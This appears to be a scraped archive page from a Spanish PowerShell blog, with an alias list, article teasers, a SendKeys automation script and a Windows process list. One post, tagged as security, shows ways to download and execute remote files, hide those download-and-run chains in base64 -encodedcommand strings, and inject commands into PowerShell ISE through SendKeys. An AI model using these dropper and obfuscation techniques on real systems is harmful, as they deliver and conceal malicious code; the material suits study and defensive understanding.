powershell_ise | Scripting and security

Alias           % -> ForEach-Object                                                   
Alias           ? -> Where-Object                                                     
Alias           ac -> Add-Content                                                     
Alias           asnp -> Add-PSSnapin                                                  
Alias           cat -> Get-Content                                                    
Alias           cd -> Set-Location                                                    
Alias           CFS -> ConvertFrom-String
Alias           chdir -> Set-Location                                                 
Alias           clc -> Clear-Content                                                  
Alias           clear -> Clear-Host                                                   
Alias           clhy -> Clear-History                                                 
Alias           cli -> Clear-Item                                                     
Alias           clp -> Clear-ItemProperty                                             
Alias           cls -> Clear-Host                                                     
Alias           clv -> Clear-Variable                                                 
Alias           cnsn -> Connect-PSSession                                             
Alias           compare -> Compare-Object                                             
Alias           copy -> Copy-Item                                                     
Alias           cp -> Copy-Item                                                       
Alias           cpi -> Copy-Item                                                      
Alias           cpp -> Copy-ItemProperty                                              
Alias           curl -> Invoke-WebRequest                                             
Alias           cvpa -> Convert-Path                                                  
Alias           dbp -> Disable-PSBreakpoint                                           
Alias           del -> Remove-Item                                                    
Alias           diff -> Compare-Object                                                
Alias           dir -> Get-ChildItem                                                  
Alias           dnsn -> Disconnect-PSSession                                          
Alias           ebp -> Enable-PSBreakpoint                                            
Alias           echo -> Write-Output                                                  
Alias           epal -> Export-Alias                                                  
Alias           epcsv -> Export-Csv                                                   
Alias           epsn -> Export-PSSession                                              
Alias           erase -> Remove-Item                                                  
Alias           etsn -> Enter-PSSession                                               
Alias           exsn -> Exit-PSSession                                                
Alias           fc -> Format-Custom                                                   
Alias           fhx -> Format-Hex
Alias           fl -> Format-List                                                     
Alias           foreach -> ForEach-Object                                             
Alias           ft -> Format-Table                                                    
Alias           fw -> Format-Wide                                                     
Alias           gal -> Get-Alias                                                      
Alias           gbp -> Get-PSBreakpoint                                               
Alias           gc -> Get-Content                                                     
Alias           gci -> Get-ChildItem                                                  
Alias           gcm -> Get-Command                                                    
Alias           gcs -> Get-PSCallStack                                                
Alias           gdr -> Get-PSDrive                                                    
Alias           ghy -> Get-History                                                    
Alias           gi -> Get-Item                                                        
Alias           gjb -> Get-Job                                                        
Alias           gl -> Get-Location                                                    
Alias           gm -> Get-Member                                                      
Alias           gmo -> Get-Module                                                     
Alias           gp -> Get-ItemProperty                                                
Alias           gps -> Get-Process                                                    
Alias           gpv -> Get-ItemPropertyValue                                          
Alias           group -> Group-Object                                                 
Alias           gsn -> Get-PSSession                                                  
Alias           gsnp -> Get-PSSnapin                                                  
Alias           gsv -> Get-Service                                                    
Alias           gu -> Get-Unique                                                      
Alias           gv -> Get-Variable                                                    
Alias           gwmi -> Get-WmiObject                                                 
Alias           h -> Get-History                                                      
Alias           history -> Get-History                                                
Alias           icm -> Invoke-Command                                                 
Alias           iex -> Invoke-Expression                                              
Alias           ihy -> Invoke-History                                                 
Alias           ii -> Invoke-Item                                                     
Alias           ipal -> Import-Alias                                                  
Alias           ipcsv -> Import-Csv                                                   
Alias           ipmo -> Import-Module                                                 
Alias           ipsn -> Import-PSSession                                              
Alias           irm -> Invoke-RestMethod                                              
Alias           ise -> powershell_ise.exe                                             
Alias           iwmi -> Invoke-WMIMethod                                              
Alias           iwr -> Invoke-WebRequest                                              
Alias           kill -> Stop-Process                                                  
Alias           lp -> Out-Printer                                                     
Alias           ls -> Get-ChildItem                                                   
Alias           man -> help                                                           
Alias           md -> mkdir                                                           
Alias           measure -> Measure-Object                                             
Alias           mi -> Move-Item                                                       
Alias           mount -> New-PSDrive                                                  
Alias           move -> Move-Item                                                     
Alias           mp -> Move-ItemProperty                                               
Alias           mv -> Move-Item                                                       
Alias           nal -> New-Alias                                                      
Alias           ndr -> New-PSDrive                                                    
Alias           ni -> New-Item                                                        
Alias           nmo -> New-Module                                                     
Alias           npssc -> New-PSSessionConfigurationFile                               
Alias           nsn -> New-PSSession                                                  
Alias           nv -> New-Variable                                                    
Alias           ogv -> Out-GridView                                                   
Alias           oh -> Out-Host                                                        
Alias           popd -> Pop-Location                                                  
Alias           ps -> Get-Process                                                     
Alias           pushd -> Push-Location                                                
Alias           pwd -> Get-Location                                                   
Alias           r -> Invoke-History                                                   
Alias           rbp -> Remove-PSBreakpoint                                            
Alias           rcjb -> Receive-Job                                                   
Alias           rcsn -> Receive-PSSession                                             
Alias           rd -> Remove-Item                                                     
Alias           rdr -> Remove-PSDrive                                                 
Alias           ren -> Rename-Item                                                    
Alias           ri -> Remove-Item                                                     
Alias           rjb -> Remove-Job                                                     
Alias           rm -> Remove-Item                                                     
Alias           rmdir -> Remove-Item                                                  
Alias           rmo -> Remove-Module                                                  
Alias           rni -> Rename-Item                                                    
Alias           rnp -> Rename-ItemProperty                                            
Alias           rp -> Remove-ItemProperty                                             
Alias           rsn -> Remove-PSSession                                               
Alias           rsnp -> Remove-PSSnapin                                               
Alias           rujb -> Resume-Job                                                    
Alias           rv -> Remove-Variable                                                 
Alias           rvpa -> Resolve-Path                                                  
Alias           rwmi -> Remove-WMIObject                                              
Alias           sajb -> Start-Job                                                     
Alias           sal -> Set-Alias                                                      
Alias           saps -> Start-Process                                                 
Alias           sasv -> Start-Service                                                 
Alias           sbp -> Set-PSBreakpoint                                               
Alias           sc -> Set-Content                                                     
Alias           select -> Select-Object                                               
Alias           set -> Set-Variable                                                   
Alias           shcm -> Show-Command                                                  
Alias           si -> Set-Item                                                        
Alias           sl -> Set-Location                                                    
Alias           sleep -> Start-Sleep                                                  
Alias           sls -> Select-String                                                  
Alias           sort -> Sort-Object                                                   
Alias           sp -> Set-ItemProperty                                                
Alias           spjb -> Stop-Job                                                      
Alias           spps -> Stop-Process                                                  
Alias           spsv -> Stop-Service                                                  
Alias           start -> Start-Process                                                
Alias           sujb -> Suspend-Job                                                   
Alias           sv -> Set-Variable                                                    
Alias           swmi -> Set-WMIInstance                                               
Alias           tee -> Tee-Object                                                     
Alias           trcm -> Trace-Command                                                 
Alias           type -> Get-Content                                                   
Alias           wget -> Invoke-WebRequest                                             
Alias           where -> Where-Object                                                 
Alias           wjb -> Wait-Job                                                       
Alias           write -> Write-Output

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

Alias % -> ForEach-Object

Alias ? -> Where-Object

Alias ac -> Add-Content

Alias asnp -> Add-PSSnapin

Alias cat -> Get-Content

Alias cd -> Set-Location

Alias CFS -> ConvertFrom-String

Alias chdir -> Set-Location

Alias clc -> Clear-Content

Alias clear -> Clear-Host

Alias clhy -> Clear-History

Alias cli -> Clear-Item

Alias clp -> Clear-ItemProperty

Alias cls -> Clear-Host

Alias clv -> Clear-Variable

Alias cnsn -> Connect-PSSession

Alias compare -> Compare-Object

Alias copy -> Copy-Item

Alias cp -> Copy-Item

Alias cpi -> Copy-Item

Alias cpp -> Copy-ItemProperty

Alias curl -> Invoke-WebRequest

Alias cvpa -> Convert-Path

Alias dbp -> Disable-PSBreakpoint

Alias del -> Remove-Item

Alias diff -> Compare-Object

Alias dir -> Get-ChildItem

Alias dnsn -> Disconnect-PSSession

Alias ebp -> Enable-PSBreakpoint

Alias echo -> Write-Output

Alias epal -> Export-Alias

Alias epcsv -> Export-Csv

Alias epsn -> Export-PSSession

Alias erase -> Remove-Item

Alias etsn -> Enter-PSSession

Alias exsn -> Exit-PSSession

Alias fc -> Format-Custom

Alias fhx -> Format-Hex

Alias fl -> Format-List

Alias foreach -> ForEach-Object

Alias ft -> Format-Table

Alias fw -> Format-Wide

Alias gal -> Get-Alias

Alias gbp -> Get-PSBreakpoint

Alias gc -> Get-Content

Alias gci -> Get-ChildItem

Alias gcm -> Get-Command

Alias gcs -> Get-PSCallStack

Alias gdr -> Get-PSDrive

Alias ghy -> Get-History

Alias gi -> Get-Item

Alias gjb -> Get-Job

Alias gl -> Get-Location

Alias gm -> Get-Member

Alias gmo -> Get-Module

Alias gp -> Get-ItemProperty

Alias gps -> Get-Process

Alias gpv -> Get-ItemPropertyValue

Alias group -> Group-Object

Alias gsn -> Get-PSSession

Alias gsnp -> Get-PSSnapin

Alias gsv -> Get-Service

Alias gu -> Get-Unique

Alias gv -> Get-Variable

Alias gwmi -> Get-WmiObject

Alias h -> Get-History

Alias history -> Get-History

Alias icm -> Invoke-Command

Alias iex -> Invoke-Expression

Alias ihy -> Invoke-History

Alias ii -> Invoke-Item

Alias ipal -> Import-Alias

Alias ipcsv -> Import-Csv

Alias ipmo -> Import-Module

Alias ipsn -> Import-PSSession

Alias irm -> Invoke-RestMethod

Alias ise -> powershell_ise.exe

Alias iwmi -> Invoke-WMIMethod

Alias iwr -> Invoke-WebRequest

Alias kill -> Stop-Process

Alias lp -> Out-Printer

Alias ls -> Get-ChildItem

Alias man -> help

Alias md -> mkdir

Alias measure -> Measure-Object

Alias mi -> Move-Item

Alias mount -> New-PSDrive

Alias move -> Move-Item

Alias mp -> Move-ItemProperty

Alias mv -> Move-Item

Alias nal -> New-Alias

Alias ndr -> New-PSDrive

Alias ni -> New-Item

Alias nmo -> New-Module

Alias npssc -> New-PSSessionConfigurationFile

Alias nsn -> New-PSSession

Alias nv -> New-Variable

Alias ogv -> Out-GridView

Alias oh -> Out-Host

Alias popd -> Pop-Location

Alias ps -> Get-Process

Alias pushd -> Push-Location

Alias pwd -> Get-Location

Alias r -> Invoke-History

Alias rbp -> Remove-PSBreakpoint

Alias rcjb -> Receive-Job

Alias rcsn -> Receive-PSSession

Alias rd -> Remove-Item

Alias rdr -> Remove-PSDrive

Alias ren -> Rename-Item

Alias ri -> Remove-Item

Alias rjb -> Remove-Job

Alias rm -> Remove-Item

Alias rmdir -> Remove-Item

Alias rmo -> Remove-Module

Alias rni -> Rename-Item

Alias rnp -> Rename-ItemProperty

Alias rp -> Remove-ItemProperty

Alias rsn -> Remove-PSSession

Alias rsnp -> Remove-PSSnapin

Alias rujb -> Resume-Job

Alias rv -> Remove-Variable

Alias rvpa -> Resolve-Path

Alias rwmi -> Remove-WMIObject

Alias sajb -> Start-Job

Alias sal -> Set-Alias

Alias saps -> Start-Process

Alias sasv -> Start-Service

Alias sbp -> Set-PSBreakpoint

Alias sc -> Set-Content

Alias select -> Select-Object

Alias set -> Set-Variable

Alias shcm -> Show-Command

Alias si -> Set-Item

Alias sl -> Set-Location

Alias sleep -> Start-Sleep

Alias sls -> Select-String

Alias sort -> Sort-Object

Alias sp -> Set-ItemProperty

Alias spjb -> Stop-Job

Alias spps -> Stop-Process

Alias spsv -> Stop-Service

Alias start -> Start-Process

Alias sujb -> Suspend-Job

Alias sv -> Set-Variable

Alias swmi -> Set-WMIInstance

Alias tee -> Tee-Object

Alias trcm -> Trace-Command

Alias type -> Get-Content

Alias wget -> Invoke-WebRequest

Alias where -> Where-Object

Alias wjb -> Wait-Job

Alias write -> Write-Output

PowerShell

8. Gestión de usuarios en PowerShell (nivel intermedio)

08/07/201721/04/2019

Los sistemas operativos actuales se pueden utilizar por uno o varios usuarios, en algunos sistemas pueden hacerlo simultáneamente y en otros no. Los usuarios se pueden crear localmente o en red, la gestión de usuarios locales sólo afecta al equipo desde el que se crean, modifican, eliminan, etc. Los usuarios locales sólo sirven para iniciar sesión o acceder a recursos en el propio equipo, en cambio los usuarios en red pueden iniciar sesión en cualquier equipo de la red. En la mayoría de los sistemas operativos, las personas que los utilizan necesitan autentificarse mediante una cuenta de usuario y, además, […]

PowerShell

1. Introducción a PowerShell (nivel intermedio)

01/07/201721/04/2019

Desde el año 2006 Microsoft dispone de una línea de comandos mejorada que se denomina PowerShell (aunque los orígenes de PowerShell datan de años anteriores y el nombre del proyecto se conocía como MONAD), es más potente y rica que la consola de MS-DOS. PowerShell es una línea de comandos con tecnología de scripting basada en tareas que proporciona a los administradores de tecnologías de la información (TI) un control integral y la posibilidad de automatizar las tareas de administración del sistema. PowerShell se ha creado sobre .NET Framework, Common Language Runtime (CLR) y .NET Framework, y acepta y devuelve […]

Automation PowerShell

Ejecutar cmdlets en PowerShell leyendo desde un fichero utilizando SendKeys

04/12/201604/12/2016

Start-Process powershell_ise
Start-Sleep -Seconds 5

gc .\ejemplo.txt | %{
foreach($letras in [char[]]$_)
{
$letras
[System.Windows.Forms.SendKeys]::SendWait($letras)
Start-Sleep -Milliseconds 500
}
[System.Windows.Forms.SendKeys]::SendWait(" ")
[System.Windows.Forms.SendKeys]::SendWait("{ENTER}")
Start-Sleep -Milliseconds 500
}

Start-Process powershell_ise

Start-Sleep -Seconds 5

gc .\ejemplo.txt | %{

foreach($letras in [char[]]$_)

{

$letras

[System.Windows.Forms.SendKeys]::SendWait($letras)

Start-Sleep -Milliseconds 500

}

[System.Windows.Forms.SendKeys]::SendWait(" ")

[System.Windows.Forms.SendKeys]::SendWait("{ENTER}")

Start-Sleep -Milliseconds 500

}

Processes

Windows processes

02/12/201601/01/2017

AsusTPCenter: ASUS Smart Gesture Center
AsusTPHelper: ASUS Smart Gesture Helper
AsusTPLoader: ASUS Smart Gesture Loader
audiodg: Aislamiento de gráficos de dispositivo de audio de Windows 
chrome: Google Chrome
dasHost: Device Association Framework Provider Host
dllhost: COM Surrogate
dwm: Administrador de ventanas del escritorio
esif_assist_64: Intel(R) Dynamic Platform and Thermal Framework Utility Application
esif_uf: Intel(R) Dynamic Platform and Thermal Framework
explorer: Explorador de Windows
igfxCUIService: igfxCUIService Module
igfxEM: igfxEM Module
igfxHK: igfxHK Module
KinectManagementService: Kinect Management Service
KinectMonitor: KinectMonitor.exe
KinectService: KinectService.exe
lsass: Local Security Authority Process
MpCmdRun: Microsoft Malware Protection Command Line Utility
MSASCuiL: Windows Defender notification icon
OneDrive: Microsoft OneDrive
powershell_ise: Windows PowerShell ISE
RAVBg64: HD Audio Background Process
RAVCpl64: Realtek HD Audio Manager
RuntimeBroker: Runtime Broker
SearchIndexer: Indizador de Microsoft Windows Search
SearchUI: Search and Cortana application
ShellExperienceHost: Windows Shell Experience Host
sihost: Shell Infrastructure Host
spoolsv: Aplicación de subsistema de cola
svchost: Proceso host para los servicios de Windows
taskhostw: Proceso de host para tareas de Windows
winlogon: Aplicación de inicio de sesión de Windows
wmpnetwk: Servicio de uso compartido de red del Reproductor de Windows Media
WUDFHost: Windows Driver Foundation - proceso host del marco de controlador de modo usuario

AsusTPCenter: ASUS Smart Gesture Center

AsusTPHelper: ASUS Smart Gesture Helper

AsusTPLoader: ASUS Smart Gesture Loader

audiodg: Aislamiento de gráficos de dispositivo de audio de Windows

chrome: Google Chrome

dasHost: Device Association Framework Provider Host

dllhost: COM Surrogate

dwm: Administrador de ventanas del escritorio

esif_assist_64: Intel(R) Dynamic Platform and Thermal Framework Utility Application

esif_uf: Intel(R) Dynamic Platform and Thermal Framework

explorer: Explorador de Windows

igfxCUIService: igfxCUIService Module

igfxEM: igfxEM Module

igfxHK: igfxHK Module

KinectManagementService: Kinect Management Service

KinectMonitor: KinectMonitor.exe

KinectService: KinectService.exe

lsass: Local Security Authority Process

MpCmdRun: Microsoft Malware Protection Command Line Utility

MSASCuiL: Windows Defender notification icon

OneDrive: Microsoft OneDrive

powershell_ise: Windows PowerShell ISE

RAVBg64: HD Audio Background Process

RAVCpl64: Realtek HD Audio Manager

RuntimeBroker: Runtime Broker

SearchIndexer: Indizador de Microsoft Windows Search

SearchUI: Search and Cortana application

ShellExperienceHost: Windows Shell Experience Host

sihost: Shell Infrastructure Host

spoolsv: Aplicación de subsistema de cola

svchost: Proceso host para los servicios de Windows

taskhostw: Proceso de host para tareas de Windows

winlogon: Aplicación de inicio de sesión de Windows

wmpnetwk: Servicio de uso compartido de red del Reproductor de Windows Media

WUDFHost: Windows Driver Foundation - proceso host del marco de controlador de modo usuario

PowerShell Security

Formas de descargar y ejecutar ficheros desde un servidor en PowerShell

15/11/201630/09/2017

#Descargar y ejecutar un fichero .exe
Set-Location $env:TEMP
Start-BitsTransfer -Source 'https://www.jesusninoc.com/app.exe'
.\app.exe

#Descargar y ejecutar un fichero .txt
Set-Location $env:TEMP
Start-BitsTransfer -Source 'https://www.jesusninoc.com/script.txt'
.\script.ps1

#Descargar y ejecutar un fichero .ps1
Set-Location $env:TEMP
Start-BitsTransfer -Source 'https://www.jesusninoc.com/script.ps1'
.\script.ps1

#Descargar un fichero .txt, renombrar a .ps1 y ejecutar
Start-BitsTransfer -Source 'https://www.jesusninoc.com/wp-content/uploads/2014/12/config.txt' -Destination $env:TEMP\config.ps1
powershell -File $env:TEMP\config.ps1

#Descargar y ejecutar un fichero .txt con cmdlets
Start-BitsTransfer -Source 'https://www.jesusninoc.com/wp-content/uploads/2014/12/config.txt'
powershell (Get-Content $env:TEMP\config.txt)

#Ejecutar código en Base64
$command="Get-Date"
$code=[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($command))
powershell -encodedcommand $code

#Descargar un fichero mediante un cmdlet en Base64
$command="Start-BitsTransfer -Source 'https://www.jesusninoc.com/wp-content/uploads/2014/12/config.txt' -Destination $env:TEMP\config2.txt"
$code=[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($command))
powershell -encodedcommand $code
Get-Content $env:TEMP\config2.txt

#Descargar un fichero mediante un cmdlet en Base64 y ejecutar el contenido del fichero
$command="Start-BitsTransfer -Source 'https://www.jesusninoc.com/wp-content/uploads/2014/12/config.txt' -Destination $env:TEMP\config2.txt"
$code=[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($command))
powershell -encodedcommand $code
powershell (Get-Content $env:TEMP\config2.txt)

#Ejecutar un cmdlet en Base64
$command="Get-Date"
$code=[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($command))
powershell -encodedcommand $code

#Ejecutar un fichero cuyo contenido está en Base64
#$command="Get-Date"
$code="RwBlAHQALQBEAGEAdABlAA=="
powershell -encodedcommand $code

#Descargar un fichero mediante un cmdlet en Base64 y ejecutar el contenido del fichero cuyo contenido está en Base64
$command="Start-BitsTransfer -Source 'https://www.jesusninoc.com/wp-content/uploads/2014/12/config.txt' -Destination $env:TEMP\config2.txt"
$code=[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($command))
powershell -encodedcommand $code
$code2=Get-Content $env:TEMP\config2.txt
powershell -encodedcommand $code2

#Descargar un fichero mediante un cmdlet en Base64 y ejecutar el contenido del fichero cuyo contenido está en Base64 (versión optimizada)
$command="Start-BitsTransfer -Source 'https://www.jesusninoc.com/wp-content/uploads/2014/12/config.txt' -Destination $env:TEMP\config2.txt"
$code=[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($command))
powershell -encodedcommand $code
#Contenido del fichero config2.txt
#$command="Get-Date"
#$code="RwBlAHQALQBEAGEAdABlAA=="
powershell -encodedcommand (Get-Content $env:TEMP\config2.txt)

#Descargar un fichero mediante un cmdlet en Base64 y ejecutar el contenido del fichero cuyo contenido está en Base64 (versión optimizada y en una línea)
$command="Start-BitsTransfer -Source https://www.jesusninoc.com/wp-content/uploads/2014/12/config.txt -Destination $env:TEMP\config2.txt";$code=[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($command));powershell -encodedcommand $code;powershell -encodedcommand (Get-Content $env:TEMP\config2.txt)

#Descargar un fichero mediante un cmdlet en Base64 y ejecutar el contenido del fichero cuyo contenido está en Base64 (realizar todas las operaciones en Base64)
$codefor64='$command="Start-BitsTransfer -Source https://www.jesusninoc.com/wp-content/uploads/2014/12/config.txt -Destination $env:TEMP\config2.txt";$code=[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($command));powershell -encodedcommand $code;$codefar=Get-Content $env:TEMP\config2.txt;powershell -encodedcommand $codefar'
$codebase64=[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($codefor64))
powershell -encodedcommand $codebase64

#Abrir PowerShell ISE y ejecutar un cmdlet
Start-Process powershell_ise
Start-Sleep -Seconds 5
[System.Windows.Forms.SendKeys]::SendWait("Get-Date")
[System.Windows.Forms.SendKeys]::SendWait("{ENTER}")

#Abrir PowerShell ISE y ejecutar un cmdlet en Base64
Start-Process powershell_ise
Start-Sleep -Seconds 5
[System.Windows.Forms.SendKeys]::SendWait("powershell -encodedcommand RwBlAHQALQBEAGEAdABlAA==")
[System.Windows.Forms.SendKeys]::SendWait("{ENTER}")

#Abrir PowerShell ISE y ejecutar un cmdlet guardado en un fichero
Start-Process powershell_ise
Start-Sleep -Seconds 5
[System.Windows.Forms.SendKeys]::SendWait('$coman=Get-Content $env:TEMP\config2.txt;powershell $coman')
[System.Windows.Forms.SendKeys]::SendWait("{ENTER}")

#Abrir PowerShell ISE y ejecutar un cmdlet copiado en el Portapapeles
Start-Process powershell_ise
Start-Sleep -Seconds 5
$copy='$coman=Get-Content $env:TEMP\config2.txt;powershell $coman'
Set-Clipboard $copy
[System.Windows.Forms.SendKeys]::SendWait("^(v)")
[System.Windows.Forms.SendKeys]::SendWait("{ENTER}")

#Abrir PowerShell ISE y ejecutar un cmdlet guardado en un fichero cuyo contenido está en Base64
Start-Process powershell_ise
Start-Sleep -Seconds 5
[System.Windows.Forms.SendKeys]::SendWait('$coman=Get-Content $env:TEMP\config2.txt;powershell -encodedcommand $coman')
[System.Windows.Forms.SendKeys]::SendWait("{ENTER}")

100

101

102

103

104

105

#Descargar y ejecutar un fichero .exe

Set-Location $env:TEMP

Start-BitsTransfer -Source 'https://www.jesusninoc.com/app.exe'

.\app.exe

#Descargar y ejecutar un fichero .txt

Set-Location $env:TEMP

Start-BitsTransfer -Source 'https://www.jesusninoc.com/script.txt'

.\script.ps1

#Descargar y ejecutar un fichero .ps1

Set-Location $env:TEMP

Start-BitsTransfer -Source 'https://www.jesusninoc.com/script.ps1'

.\script.ps1

#Descargar un fichero .txt, renombrar a .ps1 y ejecutar

Start-BitsTransfer -Source 'https://www.jesusninoc.com/wp-content/uploads/2014/12/config.txt' -Destination $env:TEMP\config.ps1

powershell -File $env:TEMP\config.ps1

#Descargar y ejecutar un fichero .txt con cmdlets

Start-BitsTransfer -Source 'https://www.jesusninoc.com/wp-content/uploads/2014/12/config.txt'

powershell (Get-Content $env:TEMP\config.txt)

#Ejecutar código en Base64

$command="Get-Date"

$code=[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($command))